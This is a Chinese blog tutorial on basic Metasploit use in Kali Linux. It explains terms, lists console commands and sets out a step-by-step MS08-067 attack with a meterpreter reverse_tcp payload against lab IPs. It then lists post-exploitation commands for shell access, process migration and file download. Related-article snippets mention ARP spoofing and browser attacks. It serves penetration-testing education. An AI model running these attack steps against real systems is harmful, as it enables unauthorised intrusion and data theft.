kali之metasploit基本使用

最新推荐文章于 2024-05-31 16:35:50 发布
最新推荐文章于 2024-05-31 16:35:50 发布
阅读量6.8k 收藏 43
点赞数 4
分类专栏: kali渗透
转载请保留出处,更多干货请关注微信公众号,句芒实验室,感谢!
本文链接:https://blog.csdn.net/Key_book/article/details/80594708
版权
metasploit简介

metasploit framework 简称 MSF.
是一个渗透攻击框架,可扩展.脚本使用ruby语言. 脚本以.rb做结尾.
msf中集成了很多渗透攻击的脚本(.rb)/模块

下面介绍下在kali中简单的使用方法.

MSF 的使用
命令行输入 msfconsole 进入metasploit

MSF 的目录
/usr/share/metasploit-framwork 

例如,
/usr/share/metasploit-framwork/module/exploits/windows/smb  下有windows 的攻击脚本,学习这个对我们理解漏洞很有帮助,

专业术语

exploits

渗透攻击

在MSF中的意思
渗透攻击是指利用一个系统/应用/服务中的安全漏洞,所进行的攻击行为

auxiliary 辅助模块

payload 攻击载荷
在MSF中的概念
我们期望目标系统在本次渗透攻击之后的代码

对于SQL注入来讲 payload poc 是一个意思都是注入的意思

shellcode
在渗透攻击时作为攻击载荷所执行的代码

module 模块
一个模块是指msf 中所使用的一段代码组建,后缀名为.rb

listener
监听器
等待网络连接的组件

它们之间的关系
当我们向目标机发送一个shellcode时,是没有交互的,所以我们用到了payload 来使目标与我们建立一个连接, 这个过程 也称shell反弹 ,是可选的,不设置也可以完成攻击 ,但通常情况下需要

常用命令
show 显示所有的攻击脚本
show auxiliary 显示所有的辅助模块以及他们的用途
show payloads 显示所有的攻击载荷
search 搜索某个模块

use 使用模块
use + 路径进入模块

info 显示模块信息

show options 显示基本信息
show targets 显示可用目标
show payloads 本目录下可用的payload

set 设置
设置payload
set payload windows/meterpreter/reverse_tcp

meterpreter 下的tcp 反弹连接

search 文件名 搜索文件

LHOST 本机IP 地址 (tcp 反弹的目标)

攻击流程
1. msfconsole #进入metasploit
2. use exploit/windows/smb/ms08_067_netapi #进入到ms08_067模块
3. set payload windows/meterpreter/reverse_tcp #设置payload
4. set LHOST 192.168.109.129 #设置本机IP
5. set RHOST 192.168.109.130 #设置目标IP
6. set target 3 #设置使用的攻击脚本
7. exploit #开始攻击

攻击成功后可以使用的常用命令

基本命令
background
将meterpter 隐藏的后台

sessions
查看隐藏在后台的会话
sessions -i [id]

quit
退出会话

shell
获取目标系统控制台shell(交互式)

系统命令
migrate
meterpreter 的迁移
从一个进程的内存空间移植到另一个进程的内存空间中去。

ps
获取目标主机上正在运行的进程信息

getpid
获取当前会话所在PID 的值

kill
结束进程

sysifo
显示系统信息

shutdown
关机

屏幕截图
screenshot

文件系统命令(meterpreter 命令)
ls
cd
cat
getpwd/pwd
upload 上传文件
download 下载文件
edit 调用类似于vim 编辑器,对目标系统上的文件进行编辑
search 搜索文件

红酒味蛋糕_
关注
  • 4
    点赞
  • 43
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
在控制台运行ruby文件代码
隔山看海
01-26 9818
1.前提是已经安装配置好ruby的运行环境,没有安装的话去官网下载安装https://rubyinstaller.org/downloads/ 2.运行ruby文件 2.1首先打开记事本,写ruby代码,这里我只写了一句输出hello,Ruby!的语句,然后保存,保存的文件后缀名一定是.rb       这里我的文件名是test.rb      保存的位置是E
Metasploit 基本使用
qq_44237206的博客
05-16 268
Metasploit程序需要使用Postgresql数据库。 PostgresqI概述: PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),是以加州大学计算机系开发的POSTGRES 4.2 版本为基础的对象关系型数据库管理系统。 官网:https://www.postgresql.org/ 注:PostgreSQL:世界上最先进的开源关系数据库 扩展:PostgreSQL和 MySQL数据的应用场景区别: 从应用场景来说,PostgreSQL更加适合严格的..
点击rb文件黑色窗口
afengxg123的专栏
09-10 719
比如使用sciTE或直接双击.rb文件,就会显示黑色的cmd窗口,怎么把这个窗口不显示?   下面的Ruby代码可以隐藏它并且自动导航到首页,有用户友好的效果。方法很简单,把下面的start.rbw放到和你的ruby文件一个目录下,双击它即可:#start.rb require "win32ole" ws = WIN32OLE.new("Wscript.Shell") ws.ru
【Web安全】kali渗透工具MSF以及msfconsole命令详解
最新发布
2301_77472496的博客
05-31 1023
记录一次体验kali渗透工具MSF以及msfconsole命令详解
MSF(metasploit) 添加脚本
YouthBelief的博客
11-05 2141
kali msf脚本存放目录 /usr/share/metasploit-framework/modules/后边根据脚本而定 VPS msf脚本存放目录 /opt/metasploit-framework/embedded/framework/modules/后边根据脚本而定 (1)把准备好的脚本放入对应的目录下 以cve-2021-41773为例 导入下方vps存放地址脚本即可 /opt/metasploit-framework/embedded/framework/modules/exploits
kali Linux命令大全
qq_41814777的博客
10-15 2万+
Kali Linux 命令集 系统信息 arch 显示机器的处理器架构(1) uname -m 显示机器的处理器架构(2) uname -r 显示正在使用的内核版本 dmidecode -q 显示硬件系统部件 - (SMBIOS / DMI) hdparm -i /dev/hda 罗列一个磁盘的架构特性 hdparm -tT /dev/sda 在磁盘上执行测试性读取操作 cat /proc/cpu...
Kali常见攻击手段
weixin_45565886的博客
02-07 2万+
Kali常见攻击手段
kali-linux 工具Metasploit离线式攻击使用教程
12-29
在IT安全领域,Kali Linux是一款著名的开源渗透测试操作系统,其包含了各种安全工具,而Metasploit则是其的重要组件之一,主要用于进行安全漏洞利用和红队演练。本教程将聚焦于Metasploit的离线攻击使用方法,这...
metasploit使用手册.xmind
10-16
metasploit神器总结,介绍基本命令、模块、信息收集、后渗透攻击等。渗透攻击步骤。主机扫描。辅助模块端口扫描。查找可用端口模块。msf>search portscan。服务扫描、辅助模块
使用kali-linux将Metasploit Framework接入互联网的使用教程
12-29
使用kali-linux将Metasploit Framework接入互联网的使用教程
kali基本配置
12-23
此外,Kali Linux 包含大量预装的渗透测试工具,如 Nmap、Wireshark、Metasploit 等,用户应根据自己的需求和兴趣逐步学习和掌握这些工具的使用方法。 总之,Kali Linux 的配置过程涉及到系统更新、硬件驱动安装、...
kali linux msf系列视频教程
10-25
kali msf 系列 第一章虚拟机使用 kali msf 系列 第一章虚拟机使用 kali msf 系列 第二章MSF基础使用+第一个实验 kali msf 系列 第三章浏览器漏洞提权 kali msf 系列 第四章利用快捷方式漏洞进行渗透提权 kali msf ...
kali常用命令总结
li1136594919的博客
03-21 2838
有时候突然就想不起来kali一些工具的命令,放在这有时间多看几次。个人向,若有错误,请大见谅。
Kali Linux DDos攻击、CC攻击、ARP攻击
qq_61901169的博客
06-03 2244
注:Kali官网下载可以直接打开的2023版本的虚拟机无法运行
Kali常见攻击手段_kali攻击
分享Python知识
11-17 3347
Kali常见攻击手段_kali攻击
kali攻击命令大全_利用msf攻击win10
weixin_35513543的博客
11-27 1万+
攻击环境:攻击者系统:虚拟机下kali linux靶机系统:win10(需要打开Easy File Sharing服务)攻击者ip:10.3.134.27靶机ip:10.3.37.56攻击者和靶机在同一个wifi下,保证在同一网段里,能互相ping通。漏洞利用:EsayFileSharing注意点: 攻击者的虚拟机网络模式应选择桥接模式。准备工作完成,可以开始内网渗透之旅了。step-1首先我们先...
入门学习Linux常用必会60个命令实例详解 Linux必学的60个命令
热门推荐
颗粒归仓
04-08 10万+
系统信息  arch 显示机器的处理器架构(1)  uname -m 显示机器的处理器架构(2)  uname -r 显示正在使用的内核版本  dmidecode -q 显示硬件系统部件 - (SMBIOS / DMI)  hdparm -i /dev/hda 罗列一个磁盘的架构特性  hdparm -tT /dev/sda 在磁盘上执行测试性读取操作  cat /proc/cpui
KaLi Linux渗透攻击
weixin_64531675的博客
06-12 3337
被动攻击的思路:渗透者构造一个攻击用的Web服务器,然后将这个Web服务器的网址发给目标用户,当目标用户使用有漏洞的浏览器打开这个网址时,攻击用的Web服务器就会向浏览器发送各种攻击脚本,如果其某个攻击脚本攻击成功的话,就会在目标主机上建立一个meterpreter会话。使用browser_autopwn2模块可以建立一个攻击用的WEB服务器,这个服务器集成了多个浏览器漏洞,可以向浏览器发送各种攻击脚本,只要有一个攻击脚本攻击成功,即可建立会话。(将该网址复制到靶机访问)
kali攻击命令大全_间人攻击之ARP欺骗
weixin_31188927的博客
12-25 1万+
我不会RAP,但我会ARP——老欢环境:攻击机:kali linux (ip地址:192.168.204.128)靶机:windows server 2003(IP地址:192.168.204.132)以上均是虚拟机环境,网络模式为NAT模式检验虚拟机之间的网络是否连通ARP断网攻击在终端输入命令:arpspoof -i eth0 -t 192.168.204.132 192.168.204.2命...
kali使用metasploit
08-26
Kali Linux 是一款专门为网络安全测试和渗透测试而设计的操作系统,并且内置了 Metasploit 框架。Metasploit 是一个用于开发和执行各种渗透测试和漏洞利用的工具集。 要使用 Metasploit,首先打开终端并输入"msfconsole"命令,这会启动 Metasploit 控制台。在控制台,你可以使用各种命令来搜索和利用漏洞。 例如,你可以使用"search"命令来搜索特定漏洞或攻击模块。例如,输入"search exploit"将会列出所有可用的漏洞利用模块。 接下来,你可以使用"use"命令选择一个特定的漏洞利用模块。例如,输入"use exploit/windows/smb/ms08_067_netapi"将选择 MS08-067 漏洞利用模块。 然后,你可以使用"show options"命令查看该模块的可配置选项。根据需要,你可以设置不同的参数值。 最后,使用"exploit"命令执行漏洞利用。根据具体情况,它可能会尝试获取对目标系统的访问权限或执行其他操作。 重要提示:请确保你在合法授权和合法目的的情况下使用 Metasploit 工具。在进行任何渗透测试活动之前,请确保已经取得相关授权和充分测试环境。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值